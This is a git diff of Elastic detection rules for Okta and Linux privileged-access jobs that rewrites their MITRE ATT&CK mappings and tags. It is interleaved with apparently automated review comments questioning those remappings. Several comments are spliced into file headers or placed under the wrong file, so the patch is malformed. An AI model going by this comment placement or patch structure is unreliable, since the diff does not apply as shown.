diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index 35aec3b7673..d157ea4686f 100644 --- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/14" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic", "Austin Songer"] @@ -76,18 +76,35 @@ event.dataset:okta.system and event.action:app.generic.unauth_app_access_attempt [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index dfa658d7dcd..3980b66a6b4 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml 
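Review bot: The three new `[[rule.threat]]` entries in the second hunk (Defense Evasion, Persistence, Privilege Escalation) carry a tactic but no `[[rule.threat.technique]]`, while the existing Initial Access entry keeps `T1078` "Valid Accounts"; T1078 is the technique these extra tactics are being attached for, and the suspicious-activity-reported rule later in this chunk repeats the T1078 block under each of its tactic entries, so this file should do the same. Separately, no hunk in the diff touches this file's tags line, so unless it already lists them the rule will lack the `"Tactic: Defense Evasion"`, `"Tactic: Persistence"` and `"Tactic: Privilege Escalation"` tags that the new threat tactics call for.
```toml
[[rule.threat]]
framework = "MITRE ATT&CK"

[[rule.threat.technique]]
id = "T1078"
name = "Valid Accounts"
reference = "https://attack.mitre.org/techniques/T1078/"

# … unchanged: [rule.threat.tactic] TA0005 Defense Evasion …
# … same technique block under the TA0003 Persistence and TA0004 Privilege Escalation entries …
```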
+++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/09" [rule] author = ["Elastic"] @@ -68,7 +68,13 @@ references = [ risk_score = 47 rule_id = "1ceb05c4-7d25-11ee-9562-f661ea17fbcd" severity = "medium" -tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Data Source: Okta", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -105,36 +111,14 @@ value = "now-5d" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.007" -name = "Hybrid Identity" -reference = "https://attack.mitre.org/techniques/T1556/007/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 8f3817af63a..2a87b962d34 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ references = ["https://trust.okta.com/security-advisories/okta-classic-applicati risk_score = 47 rule_id = "1502a836-84b2-11ef-b026-f661ea17fbcc" severity = "medium" -tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: SaaS", + "Data Source: Okta", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -71,39 +78,17 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index e85d24507ef..3cee4601d83 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -78,3 +78,52 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index b81063de51f..fdf12c3e90b 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
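Review bot: This file gains four `[[rule.threat]]` entries (Initial Access, Persistence, Privilege Escalation, Defense Evasion), but no hunk in the diff touches its tags line, so unless it already carries them the rule will be missing the `"Tactic: Initial Access"`, `"Tactic: Persistence"`, `"Tactic: Privilege Escalation"` and `"Tactic: Defense Evasion"` tags that mirror the new mapping. The added blocks also use a layout unlike the context lines in every other file here: no blank line after `framework`, two blank lines before `[rule.threat.tactic]`, and the next `[[rule.threat]]` butted against the previous tactic's `reference` line. Normalising them to the spacing the surrounding files use would keep later diffs of this file readable.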
@@ -68,7 +68,12 @@ references = [ risk_score = 47 rule_id = "621e92b6-7e54-11ee-bdc0-f661ea17fbcd" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -82,21 +87,22 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.threshold] field = ["okta.actor.id"] value = 1 diff --git a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml index d58958991d7..efa11cf5d96 100644 --- a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml +++ b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -37,7 +37,7 @@ risk_score = 47 rule_id = "6885d2ae-e008-4762-b98a-e8e1cd3a81e9" rule_name_override = "okta.display_message" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Resources: Investigation Guide"] +tags = ["Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -65,31 +65,3 @@ severity = "high" value = "HIGH" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml index 6077dd8a367..859394bc1c4 100644 --- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml +++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -70,7 +70,12 @@ references = [ risk_score = 47 rule_id = "b8075894-0b62-46e5-977c-31275da34419" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -81,36 +86,14 @@ event.dataset:okta.system and event.action:group.privilege.grant [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml index 14ed0422b6f..4e3bb956cee 100644 --- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml +++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -72,7 +72,14 @@ references = [ risk_score = 47 rule_id = "f06414a6-f2a4-466d-8eba-10f85e8abf71" severity = "medium" -tags = ["Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Identity", + "Data Source: Okta", + "Data Source: Okta System Logs", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -85,36 +92,14 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml index b132c287c30..3d49244c971 100644 --- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml 
+++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -85,18 +85,14 @@ event.dataset:okta.system and event.action:system.api_token.create [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml index f3e560d02e4..3f356b7f3ee 100644 --- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml +++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/08" [rule] author = ["Elastic"] 
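Review bot: The technique swap to `T1136` "Create Account" in the second hunk does not match what `event.action:system.api_token.create` records: an API token is a credential issued for an account that already exists, not a new account. The `T1098.001` "Additional Cloud Credentials" subtechnique this hunk removes is the ATT&CK entry that describes adding credentials or tokens to an existing identity, so the previous mapping reads as the more accurate one; if the change is driven by a coverage decision made elsewhere, say so in the commit message so the mapping is not "corrected" back later.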
@@ -66,7 +66,13 @@ risk_score = 21
 rule_id = "cd89602e-9db0-48e3-9391-ae3bf241acd8"
 setup = "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n"
 severity = "low"
-tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Domain: Cloud", "Resources: Investigation Guide"]
+tags = [
+ "Tactic: Persistence",
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Domain: Cloud",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -79,36 +85,19 @@ sequence by okta.target.id with maxspan=12h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1556.006"
-name = "Multi-Factor Authentication"
-reference = "https://attack.mitre.org/techniques/T1556/006/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
index 24d114ed045..b85da21efcb 100644
--- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
+++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/01"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -70,7 +70,12 @@ references = [
 risk_score = 47
 rule_id = "cd16fb10-0261-46e8-9932-a0336278cdbe"
 severity = "medium"
-tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
+tags = [
+ "Tactic: Persistence",
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -81,18 +86,14 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.009"
-name = "Conditional Access Policies"
-reference = "https://attack.mitre.org/techniques/T1556/009/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
index 22ef2ee2fc5..b0edb92b585 100644
--- a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
+++ b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
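Review bot: Dropping the T1556.009 Conditional Access Policies sub-technique loses the most specific mapping this rule had: the query (visible in the hunk header) matches `application.policy.sign_on.update` and a sibling action, and an application sign-on policy is precisely the conditional-access control that sub-technique describes. Moving the tactic from Defense Evasion to Persistence does not require removing it; the four removed `[[rule.threat.technique.subtechnique]]` lines with `id = "T1556.009"` can stay under the new TA0003 tactic entry unchanged. If the intent was to drop Defense Evasion coverage only, the tags hunk above is already consistent with that and nothing else needs to change.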
@@ -2,7 +2,7 @@
 creation_date = "2023/11/09"
 integration = ["endpoint", "okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -65,7 +65,16 @@ references = [
 risk_score = 73
 rule_id = "5610b192-7f18-11ee-825b-f661ea17fbcd"
 severity = "high"
-tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Data Source: Elastic Defend", "Rule Type: Higher-Order Rule", "Domain: Endpoint", "Domain: Cloud", "Resources: Investigation Guide"]
+tags = [
+ "Tactic: Persistence",
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Data Source: Elastic Defend",
+ "Rule Type: Higher-Order Rule",
+ "Domain: Endpoint",
+ "Domain: Cloud",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -78,36 +87,19 @@ sequence by user.name with maxspan=12h
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
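Review bot: The new side keeps only T1556.006 under Persistence and removes the whole T1078.004 Cloud Accounts entry together with the Initial Access tactic, yet this is a `sequence by user.name` rule whose file name describes stolen credentials being used to log in after an MFA reset; the login half of that sequence is exactly Valid Accounts: Cloud Accounts, so the rule loses the mapping for the behaviour that makes it high severity. Unless the query body (outside the hunk) no longer contains the login step, the removed `[[rule.threat]]` entry with `id = "T1078"` / `id = "T1078.004"` under TA0001 should be kept as a second threat entry, which the per-framework duplicate check does not forbid since the tactic differs. `Tactic: Initial Access` was dropped from `tags` in the hunk above in step with this, so both would need to return together.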
diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
index fa9852ed253..95c5b7cbd46 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
@@ -89,13 +89,14 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
index 8147cfbf1d0..cea8bce82f4 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
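Review bot: Replacing T1548 Abuse Elevation Control Mechanism with T1078 Valid Accounts changes what this rule claims to detect: a high count of privileged process events for a Linux user is evidence of elevation (the sudo/setuid-style activity T1548 covers), not of an adversary operating through a legitimate account, so the earlier mapping appears to be the better fit and the swap reads as a bulk normalisation rather than a per-rule decision. The identical T1548 to T1078 swap is made for privileged_access_ml_linux_rare_process_executed_by_user.toml later in this patch and the same concern applies there. If the goal is to standardise PAD rules on T1078, the rule descriptions (outside these hunks) should be re-read to confirm they still describe the technique now attached to them.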
@@ -80,22 +80,24 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Privileged Access Detection",
+ "Rule Type: ML",
+ "Rule Type: Machine Learning",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1027.010"
-name = "Command Obfuscation"
-reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
index 0640fa21d56..c25efcf1291 100644
--- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "sysmon_linux"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 anomaly_threshold = 75
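Review bot: The removed T1027.010 Command Obfuscation mapping was the one that matched this job's signal, a high median command-line entropy per user, which is an obfuscation indicator and not a Valid Accounts indicator; after this hunk the ATT&CK metadata describes something the rule does not measure. If a Privilege Escalation tactic is wanted so the PAD rules group together, keep T1027 and its `T1027.010` sub-technique as a separate `[[rule.threat]]` entry under TA0005 and restore `"Tactic: Defense Evasion",` in `tags`, rather than replacing the technique outright. The removed blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]` also departs from the spacing the other technique tables in this file keep.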
@@ -88,13 +88,14 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
